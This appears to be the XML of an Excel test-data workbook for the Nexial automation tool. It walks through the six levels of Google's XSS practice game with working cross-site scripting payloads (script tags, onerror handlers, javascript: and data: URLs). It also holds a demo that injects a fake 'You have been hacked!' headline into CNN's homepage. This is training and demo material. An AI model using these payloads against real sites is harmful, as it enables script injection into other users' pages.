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F2EDCE3-6963-1E41-8F50-2995A28FBE71}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="460" windowWidth="28800" windowHeight="35540" tabRatio="500" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="#default" sheetId="2" r:id="rId1"/>
    <sheet name="xss-games" sheetId="3" r:id="rId2"/>
    <sheet name="js1" sheetId="4" r:id="rId3"/>
    <sheet name="js2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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="124" uniqueCount="103">
  <si>
    <t>true</t>
  </si>
  <si>
    <t>nexial.scope.fallbackToPrevious</t>
  </si>
  <si>
    <t>nexial.pollWaitMs</t>
  </si>
  <si>
    <t>nexial.failFast</t>
  </si>
  <si>
    <t>nexial.openResult</t>
  </si>
  <si>
    <t>750</t>
  </si>
  <si>
    <t>250</t>
  </si>
  <si>
    <t>//nexial.highlightWaitMs</t>
  </si>
  <si>
    <t>//nexial.highlight</t>
  </si>
  <si>
    <t>site url</t>
  </si>
  <si>
    <t>https://xss-game.appspot.com/</t>
  </si>
  <si>
    <t>enter site text</t>
  </si>
  <si>
    <t>Let me at 'em!</t>
  </si>
  <si>
    <t>level1 page title</t>
  </si>
  <si>
    <t>Level 1: Hello, world of XSS</t>
  </si>
  <si>
    <t>target frame loc</t>
  </si>
  <si>
    <t>//iframe</t>
  </si>
  <si>
    <t>id=query</t>
  </si>
  <si>
    <t>&lt;script&gt;alert('Hello');&lt;/script&gt;</t>
  </si>
  <si>
    <t>id=button</t>
  </si>
  <si>
    <t>pass text</t>
  </si>
  <si>
    <t>You can now advance to the next level.</t>
  </si>
  <si>
    <t>top frame loc</t>
  </si>
  <si>
    <t>relative=top</t>
  </si>
  <si>
    <t>next level loc</t>
  </si>
  <si>
    <t>css=a.next-button</t>
  </si>
  <si>
    <t>level2 page title</t>
  </si>
  <si>
    <t>Level 2: Persistence is key</t>
  </si>
  <si>
    <t>xss1</t>
  </si>
  <si>
    <t>level2 input loc</t>
  </si>
  <si>
    <t>id=post-content</t>
  </si>
  <si>
    <t>xss2</t>
  </si>
  <si>
    <t>level2 submit loc</t>
  </si>
  <si>
    <t>css=input.share</t>
  </si>
  <si>
    <t>level1 input loc</t>
  </si>
  <si>
    <t>level1 submit loc</t>
  </si>
  <si>
    <t>&lt;img src="file://inexist.ent" onerror="javascript:alert('Hello')"/&gt;</t>
  </si>
  <si>
    <t>level3 page title</t>
  </si>
  <si>
    <t>level3 input loc</t>
  </si>
  <si>
    <t>xss3</t>
  </si>
  <si>
    <t>level3 submit loc</t>
  </si>
  <si>
    <t>id=input1</t>
  </si>
  <si>
    <t>https://xss-game.appspot.com/level3/frame#3' onerror='alert("Hello")';</t>
  </si>
  <si>
    <t>css=input.urlbutton</t>
  </si>
  <si>
    <t>level4 page title</t>
  </si>
  <si>
    <t>level4 input loc</t>
  </si>
  <si>
    <t>xss4</t>
  </si>
  <si>
    <t>level4 submit loc</t>
  </si>
  <si>
    <t>Level 4: Context matters</t>
  </si>
  <si>
    <t>https://xss-game.appspot.com/level4/frame?timer=')%3Balert("Hello")%3Bvar b=('</t>
  </si>
  <si>
    <t>level5 page title</t>
  </si>
  <si>
    <t>level5 input loc</t>
  </si>
  <si>
    <t>xss5</t>
  </si>
  <si>
    <t>level5 submit loc</t>
  </si>
  <si>
    <t>Level 5: Breaking protocol</t>
  </si>
  <si>
    <t>https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('Hello')</t>
  </si>
  <si>
    <t>level5 input2 loc</t>
  </si>
  <si>
    <t>level5 submit2 loc</t>
  </si>
  <si>
    <t>id=reader-email</t>
  </si>
  <si>
    <t>//a[text()='Next &gt;&gt;']</t>
  </si>
  <si>
    <t>leve5 input2</t>
  </si>
  <si>
    <t>nobodyhere@nowhere.com</t>
  </si>
  <si>
    <t>Level 3: That sinking feeling</t>
  </si>
  <si>
    <t>level6 page title</t>
  </si>
  <si>
    <t>Level 6: Follow the</t>
  </si>
  <si>
    <t>level6 input loc</t>
  </si>
  <si>
    <t>xss6</t>
  </si>
  <si>
    <t>level6 submit loc</t>
  </si>
  <si>
    <t>https://xss-game.appspot.com/level6/frame#data:text/javascript,alert('Hello')</t>
  </si>
  <si>
    <t>https://www.cnn.com/</t>
  </si>
  <si>
    <t>remove outbrain</t>
  </si>
  <si>
    <t>var elem = document.querySelector('section.zn--idx-6'); 
elem.parentNode.removeChild(elem);</t>
  </si>
  <si>
    <t>remove partner content</t>
  </si>
  <si>
    <t>var elem = document.querySelector('section.zn--idx-10'); 
elem.parentNode.removeChild(elem);</t>
  </si>
  <si>
    <t>remove video content</t>
  </si>
  <si>
    <t>var elem = document.querySelector('section.zn--idx-5'); 
elem.parentNode.removeChild(elem);</t>
  </si>
  <si>
    <t>remove More CNN</t>
  </si>
  <si>
    <t>var elem = document.querySelector('section.zn--idx-7'); 
elem.parentNode.removeChild(elem);</t>
  </si>
  <si>
    <t>remove CNN Photos</t>
  </si>
  <si>
    <t>var elem = document.querySelector('section.zn--idx-8'); 
elem.parentNode.removeChild(elem);</t>
  </si>
  <si>
    <t>add new headlines</t>
  </si>
  <si>
    <t>1st headline</t>
  </si>
  <si>
    <t>haha msg</t>
  </si>
  <si>
    <t>nexial title</t>
  </si>
  <si>
    <t>'ul.cn--idx-2[data-vr-zone="home-top-col3"] li:nth-of-type(1)'</t>
  </si>
  <si>
    <t>You have been hacked!  ;-)</t>
  </si>
  <si>
    <t>https://nexiality.github.io/</t>
  </si>
  <si>
    <t>nexial url</t>
  </si>
  <si>
    <t>Nexial is AWESOME!</t>
  </si>
  <si>
    <t>haha style</t>
  </si>
  <si>
    <t>font-size:14pt; font-weight:bold; color:#f55; padding:3px 0; cursor: pointer;</t>
  </si>
  <si>
    <r>
      <t>jQuery(</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="5" tint="-0.499984740745262"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>${1st headline}</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>).prepend('&lt;li id="haha" onclick="alert(\'</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="5" tint="-0.499984740745262"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>${haha msg}</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>\'); document.location=\'</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="5" tint="-0.499984740745262"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>${nexial url}</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>\';" style="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="5" tint="-0.499984740745262"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>${haha style}</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>"&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="5" tint="-0.499984740745262"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>${nexial title}</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Courier New"/>
        <family val="1"/>
      </rPr>
      <t>&lt;/li&gt;')</t>
    </r>
  </si>
  <si>
    <t>nexial.browser</t>
  </si>
  <si>
    <t>remove superheader</t>
  </si>
  <si>
    <t>var elem = document.querySelector('#jpampsuperheader'); 
elem.parentNode.removeChild(elem);</t>
  </si>
  <si>
    <t>superhack</t>
  </si>
  <si>
    <t>$(syspath|data|fullpath)/web-06.js</t>
  </si>
  <si>
    <t>firefox</t>
  </si>
  <si>
    <t>ul.cn--idx-2[data-vr-zone="home-top-col3"] li:nth-of-type(1)</t>
  </si>
  <si>
    <t>nexial.web.pageLoadWaitMs</t>
  </si>
  <si>
    <t>30000</t>
  </si>
  <si>
    <t>https://nexiality.github.io/documentation/</t>
  </si>
  <si>
    <t>2 guys from Entertainment Partners is taking the world of Automation by storm with Nexial - Here\'s how they did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</si>
</sst>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theme="5" tint="-0.499984740745262"/>
      <name val="Courier New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/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont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47"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScalePageLayoutView="125" workbookViewId="0"/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1</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="HA1" s="6"/>
      <c r="AAA1" s="6"/>
    </row>
    <row r="2" spans="1:703" ht="23" customHeight="1">
      <c r="A2" s="1" t="s">
        <v>2</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>6</v>
      </c>
      <c r="HA2" s="6"/>
      <c r="AAA2" s="6"/>
    </row>
    <row r="3" spans="1:703" ht="23" customHeight="1">
      <c r="A3" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>0</v>
      </c>
      <c r="HA3" s="4"/>
      <c r="AAA3" s="5"/>
    </row>
    <row r="4" spans="1:703" ht="23" customHeight="1">
      <c r="A4" s="1" t="s">
        <v>8</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>0</v>
      </c>
      <c r="HA4" s="4"/>
      <c r="AAA4" s="5"/>
    </row>
    <row r="5" spans="1:703" ht="23" customHeight="1">
      <c r="A5" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>5</v>
      </c>
      <c r="HA5" s="4"/>
      <c r="AAA5" s="5"/>
    </row>
    <row r="6" spans="1:703" ht="23" customHeight="1">
      <c r="HA6" s="4"/>
      <c r="AAA6" s="5"/>
    </row>
    <row r="7" spans="1:703" ht="23" customHeight="1"/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</sheetData>
  <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
  <conditionalFormatting sqref="A1:A1048576">
    <cfRule type="beginsWith" dxfId="53" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="52" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="51" priority="3" stopIfTrue="1">
      <formula>LEN(TRIM(A1))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B1:B1048576">
    <cfRule type="expression" dxfId="50" priority="4" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="49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50"/>
  <sheetViews>
    <sheetView zoomScale="112" zoomScalePageLayoutView="125" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
  <cols>
    <col min="1" max="1" width="20.1640625" style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3</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="HA1" s="6"/>
      <c r="AAA1" s="6"/>
    </row>
    <row r="2" spans="1:703" ht="23" customHeight="1">
      <c r="A2" s="1" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="7" t="s">
        <v>10</v>
      </c>
      <c r="HA2" s="6"/>
      <c r="AAA2" s="6"/>
    </row>
    <row r="3" spans="1:703" ht="23" customHeight="1">
      <c r="A3" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>12</v>
      </c>
      <c r="HA3" s="6"/>
      <c r="AAA3" s="6"/>
    </row>
    <row r="4" spans="1:703" ht="23" customHeight="1">
      <c r="A4" s="1" t="s">
        <v>15</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="HA4" s="6"/>
      <c r="AAA4" s="6"/>
    </row>
    <row r="5" spans="1:703" ht="23" customHeight="1">
      <c r="A5" s="1" t="s">
        <v>20</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="HA5" s="6"/>
      <c r="AAA5" s="6"/>
    </row>
    <row r="6" spans="1:703" ht="23" customHeight="1">
      <c r="A6" s="1" t="s">
        <v>22</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>23</v>
      </c>
      <c r="HA6" s="6"/>
      <c r="AAA6" s="6"/>
    </row>
    <row r="7" spans="1:703" ht="23" customHeight="1">
      <c r="A7" s="1" t="s">
        <v>24</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>25</v>
      </c>
      <c r="HA7" s="6"/>
      <c r="AAA7" s="6"/>
    </row>
    <row r="8" spans="1:703" ht="23" customHeight="1">
      <c r="A8" s="1" t="s">
        <v>13</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>14</v>
      </c>
      <c r="HA8" s="4"/>
      <c r="AAA8" s="5"/>
    </row>
    <row r="9" spans="1:703" ht="23" customHeight="1">
      <c r="A9" s="1" t="s">
        <v>34</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>17</v>
      </c>
      <c r="HA9" s="4"/>
      <c r="AAA9" s="5"/>
    </row>
    <row r="10" spans="1:703" ht="23" customHeight="1">
      <c r="A10" s="1" t="s">
        <v>28</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>18</v>
      </c>
      <c r="HA10" s="4"/>
      <c r="AAA10" s="5"/>
    </row>
    <row r="11" spans="1:703" ht="23" customHeight="1">
      <c r="A11" s="1" t="s">
        <v>35</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>19</v>
      </c>
      <c r="HA11" s="4"/>
      <c r="AAA11" s="5"/>
    </row>
    <row r="12" spans="1:703" ht="23" customHeight="1">
      <c r="A12" s="1" t="s">
        <v>26</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="13" spans="1:703" ht="23" customHeight="1">
      <c r="A13" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="14" spans="1:703" ht="23" customHeight="1">
      <c r="A14" s="1" t="s">
        <v>31</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="15" spans="1:703" ht="23" customHeight="1">
      <c r="A15" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="16" spans="1:703" ht="23" customHeight="1">
      <c r="A16" s="1" t="s">
        <v>37</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="17" spans="1:2" ht="23" customHeight="1">
      <c r="A17" s="1" t="s">
        <v>38</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="18" spans="1:2" ht="23" customHeight="1">
      <c r="A18" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="19" spans="1:2" ht="23" customHeight="1">
      <c r="A19" s="1" t="s">
        <v>40</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="20" spans="1:2" ht="23" customHeight="1">
      <c r="A20" s="1" t="s">
        <v>44</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="21" spans="1:2" ht="23" customHeight="1">
      <c r="A21" s="1" t="s">
        <v>45</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="22" spans="1:2" ht="23" customHeight="1">
      <c r="A22" s="1" t="s">
        <v>46</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="23" spans="1:2" ht="23" customHeight="1">
      <c r="A23" s="1" t="s">
        <v>47</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="24" spans="1:2" ht="23" customHeight="1">
      <c r="A24" s="1" t="s">
        <v>50</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="25" spans="1:2" ht="23" customHeight="1">
      <c r="A25" s="1" t="s">
        <v>51</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="26" spans="1:2" ht="23" customHeight="1">
      <c r="A26" s="1" t="s">
        <v>52</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="27" spans="1:2" ht="23" customHeight="1">
      <c r="A27" s="1" t="s">
        <v>53</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="28" spans="1:2" ht="23" customHeight="1">
      <c r="A28" s="1" t="s">
        <v>56</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="29" spans="1:2" ht="23" customHeight="1">
      <c r="A29" s="1" t="s">
        <v>57</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="30" spans="1:2" ht="23" customHeight="1">
      <c r="A30" s="1" t="s">
        <v>60</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="31" spans="1:2" ht="23" customHeight="1">
      <c r="A31" s="1" t="s">
        <v>63</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="32" spans="1:2" ht="23" customHeight="1">
      <c r="A32" s="1" t="s">
        <v>65</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="33" spans="1:2" ht="23" customHeight="1">
      <c r="A33" s="1" t="s">
        <v>66</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="34" spans="1:2" ht="23" customHeight="1">
      <c r="A34" s="1" t="s">
        <v>67</v>
      </c>
      <c r="B34" s="2" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="35" spans="1:2" ht="23" customHeight="1"/>
    <row r="36" spans="1:2" ht="23" customHeight="1"/>
    <row r="37" spans="1:2" ht="23" customHeight="1"/>
    <row r="38" spans="1:2" ht="23" customHeight="1"/>
    <row r="39" spans="1:2" ht="23" customHeight="1"/>
    <row r="40" spans="1:2" ht="23" customHeight="1"/>
    <row r="41" spans="1:2" ht="23" customHeight="1"/>
    <row r="42" spans="1:2" ht="23" customHeight="1"/>
    <row r="43" spans="1:2" ht="23" customHeight="1"/>
    <row r="44" spans="1:2" ht="23" customHeight="1"/>
    <row r="45" spans="1:2" ht="23" customHeight="1"/>
    <row r="46" spans="1:2" ht="23" customHeight="1"/>
    <row r="47" spans="1:2" ht="23" customHeight="1"/>
    <row r="48" spans="1:2" ht="23" customHeight="1"/>
    <row r="49" ht="23" customHeight="1"/>
    <row r="50" ht="23" customHeight="1"/>
  </sheetData>
  <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
  <conditionalFormatting sqref="A2:A23 A28:A1048576">
    <cfRule type="beginsWith" dxfId="48" priority="18" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A2,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="47" priority="19" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A2,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="46" priority="20" stopIfTrue="1">
      <formula>LEN(TRIM(A2))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B8:B23 B28:B1048576">
    <cfRule type="expression" dxfId="45" priority="21" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="44" priority="22">
      <formula>LEN(TRIM(B8))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B3:B7">
    <cfRule type="expression" dxfId="43" priority="16" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="42" priority="17">
      <formula>LEN(TRIM(B3))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A24:A27">
    <cfRule type="beginsWith" dxfId="41" priority="11" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A24,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="40" priority="12" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A24,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="39" priority="13" stopIfTrue="1">
      <formula>LEN(TRIM(A24))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B24:B27">
    <cfRule type="expression" dxfId="38" priority="14" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="37" priority="15">
      <formula>LEN(TRIM(B24))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A1">
    <cfRule type="beginsWith" dxfId="36" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="35" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="34" priority="3" stopIfTrue="1">
      <formula>LEN(TRIM(A1))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B1">
    <cfRule type="expression" dxfId="33" priority="4" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="32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D70D-EC3E-C447-9A0C-FB9A745CCD4A}">
  <dimension ref="A1:AAA50"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="125" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
  <cols>
    <col min="1" max="1" width="21.1640625" style="1" bestFit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9</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>69</v>
      </c>
      <c r="HA1" s="6"/>
      <c r="AAA1" s="6"/>
    </row>
    <row r="2" spans="1:703" ht="48" customHeight="1">
      <c r="A2" s="1" t="s">
        <v>93</v>
      </c>
      <c r="B2" s="8" t="s">
        <v>94</v>
      </c>
      <c r="HA2" s="6"/>
      <c r="AAA2" s="6"/>
    </row>
    <row r="3" spans="1:703" ht="48" customHeight="1">
      <c r="A3" s="1" t="s">
        <v>70</v>
      </c>
      <c r="B3" s="8" t="s">
        <v>71</v>
      </c>
      <c r="HA3" s="6"/>
      <c r="AAA3" s="6"/>
    </row>
    <row r="4" spans="1:703" ht="48" customHeight="1">
      <c r="A4" s="1" t="s">
        <v>72</v>
      </c>
      <c r="B4" s="9" t="s">
        <v>73</v>
      </c>
      <c r="HA4" s="6"/>
      <c r="AAA4" s="6"/>
    </row>
    <row r="5" spans="1:703" ht="48" customHeight="1">
      <c r="A5" s="1" t="s">
        <v>74</v>
      </c>
      <c r="B5" s="9" t="s">
        <v>75</v>
      </c>
      <c r="HA5" s="6"/>
      <c r="AAA5" s="6"/>
    </row>
    <row r="6" spans="1:703" ht="48" customHeight="1">
      <c r="A6" s="1" t="s">
        <v>76</v>
      </c>
      <c r="B6" s="9" t="s">
        <v>77</v>
      </c>
      <c r="HA6" s="6"/>
      <c r="AAA6" s="6"/>
    </row>
    <row r="7" spans="1:703" ht="48" customHeight="1">
      <c r="A7" s="1" t="s">
        <v>78</v>
      </c>
      <c r="B7" s="9" t="s">
        <v>79</v>
      </c>
      <c r="HA7" s="6"/>
      <c r="AAA7" s="6"/>
    </row>
    <row r="8" spans="1:703" ht="23" customHeight="1">
      <c r="A8" s="1" t="s">
        <v>80</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>91</v>
      </c>
      <c r="HA8" s="6"/>
      <c r="AAA8" s="6"/>
    </row>
    <row r="9" spans="1:703" ht="23" customHeight="1">
      <c r="A9" s="1" t="s">
        <v>81</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>84</v>
      </c>
      <c r="HA9" s="4"/>
      <c r="AAA9" s="5"/>
    </row>
    <row r="10" spans="1:703" ht="23" customHeight="1">
      <c r="A10" s="1" t="s">
        <v>82</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>85</v>
      </c>
      <c r="HA10" s="4"/>
      <c r="AAA10" s="5"/>
    </row>
    <row r="11" spans="1:703" ht="23" customHeight="1">
      <c r="A11" s="1" t="s">
        <v>87</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>86</v>
      </c>
      <c r="HA11" s="4"/>
      <c r="AAA11" s="5"/>
    </row>
    <row r="12" spans="1:703" ht="23" customHeight="1">
      <c r="A12" s="1" t="s">
        <v>83</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>88</v>
      </c>
      <c r="HA12" s="4"/>
      <c r="AAA12" s="5"/>
    </row>
    <row r="13" spans="1:703" ht="23" customHeight="1">
      <c r="A13" s="1" t="s">
        <v>89</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="14" spans="1:703" ht="23" customHeight="1">
      <c r="A14" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>97</v>
      </c>
    </row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</sheetData>
  <sheetProtection formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
  <conditionalFormatting sqref="A3:A24 A29:A1048576">
    <cfRule type="beginsWith" dxfId="31" priority="13" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A3,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="30" priority="14" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A3,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="29" priority="15" stopIfTrue="1">
      <formula>LEN(TRIM(A3))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B9:B24 B29:B1048576">
    <cfRule type="expression" dxfId="28" priority="16" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="27" priority="17">
      <formula>LEN(TRIM(B9))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B4:B8">
    <cfRule type="expression" dxfId="26" priority="11" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="25" priority="12">
      <formula>LEN(TRIM(B4))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A25:A28">
    <cfRule type="beginsWith" dxfId="24" priority="6" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A25,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="23" priority="7" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A25,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="22" priority="8" stopIfTrue="1">
      <formula>LEN(TRIM(A25))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B25:B28">
    <cfRule type="expression" dxfId="21" priority="9" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="20" priority="10">
      <formula>LEN(TRIM(B25))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A1:A2">
    <cfRule type="beginsWith" dxfId="19" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="18" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="17" priority="3" stopIfTrue="1">
      <formula>LEN(TRIM(A1))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B1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9A6-B04F-F04A-A0B0-1891A89B2B01}">
